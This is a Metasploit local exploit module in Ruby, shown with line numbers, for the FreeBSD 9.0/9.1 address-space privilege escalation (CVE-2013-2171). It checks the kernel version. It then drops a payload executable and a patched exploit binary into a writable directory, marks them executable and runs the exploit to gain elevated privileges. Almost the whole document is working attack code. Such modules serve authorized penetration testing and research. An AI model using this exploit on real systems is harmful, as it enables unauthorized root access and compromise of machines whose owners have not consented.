1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Post::File
11
  include Msf::Exploit::FileDropper
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
18
        'Description' => %q{
19
          This module exploits a vulnerability that can be used to modify portions of
20
          a process's address space, which may lead to privilege escalation.  Systems
21
          such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'Konstantin Belousov',   # Discovery
26
          'Alan Cox',              # Discovery
27
          'Hunger',                # POC
28
          'sinn3r'                 # Metasploit
29
        ],
30
        'Platform' => [ 'bsd' ],
31
        'Arch' => [ ARCH_X86 ],
32
        'SessionTypes' => [ 'shell' ],
33
        'References' => [
34
          [ 'CVE', '2013-2171' ],
35
          [ 'OSVDB', '94414' ],
36
          [ 'EDB', '26368' ],
37
          [ 'BID', '60615' ],
38
          [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
39
        ],
40
        'Targets' => [
41
          [ 'FreeBSD x86', {} ]
42
        ],
43
        'DefaultTarget' => 0,
44
        'DisclosureDate' => '2013-06-18',
45
        'Notes' => {
46
          'Stability' => [ CRASH_SAFE, ],
47
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
48
          'Reliability' => [ REPEATABLE_SESSION, ]
49
        }
50
      )
51
    )
52
    register_options([
53
      # It isn't OptPath becuase it's a *remote* path
54
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
55
    ])
56
  end
57

58
  def check
59
    res = cmd_exec('uname -a')
60
    return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
61

62
    Exploit::CheckCode::Safe
63
  end
64

65
  def upload_payload
66
    fname = datastore['WritableDir']
67
    fname = "#{fname}/" unless fname =~ %r{/$}
68
    if fname.length > 36
69
      fail_with(Failure::BadConfig, "WritableDir can't be longer than 33 characters")
70
    end
71
    fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
72

73
    p = generate_payload_exe
74
    write_file(fname, p)
75
    return nil if !file_exist?(fname)
76

77
    cmd_exec("chmod +x #{fname}")
78
    fname
79
  end
80

81
  def generate_exploit(payload_fname)
82
    #
83
    # Metasm does not support FreeBSD executable generation.
84
    #
85
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-2171.bin')
86
    x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
87
    x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
88
  end
89

90
  def upload_exploit(payload_fname)
91
    fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
92
    bin = generate_exploit(payload_fname)
93
    write_file(fname, bin)
94
    return nil if !file_exist?(fname)
95

96
    cmd_exec("chmod +x #{fname}")
97
    fname
98
  end
99

100
  def exploit
101
    payload_fname = upload_payload
102
    fail_with(Failure::NotFound, 'Payload failed to upload') if payload_fname.nil?
103
    print_status("Payload #{payload_fname} uploaded.")
104

105
    exploit_fname = upload_exploit(payload_fname)
106
    fail_with(Failure::NotFound, 'Exploit failed to upload') if exploit_fname.nil?
107
    print_status("Exploit #{exploit_fname} uploaded.")
108

109
    register_files_for_cleanup(payload_fname, exploit_fname)
110

111
    print_status("Executing #{exploit_fname}")
112
    cmd_exec(exploit_fname)
113
  end
114
end
115

116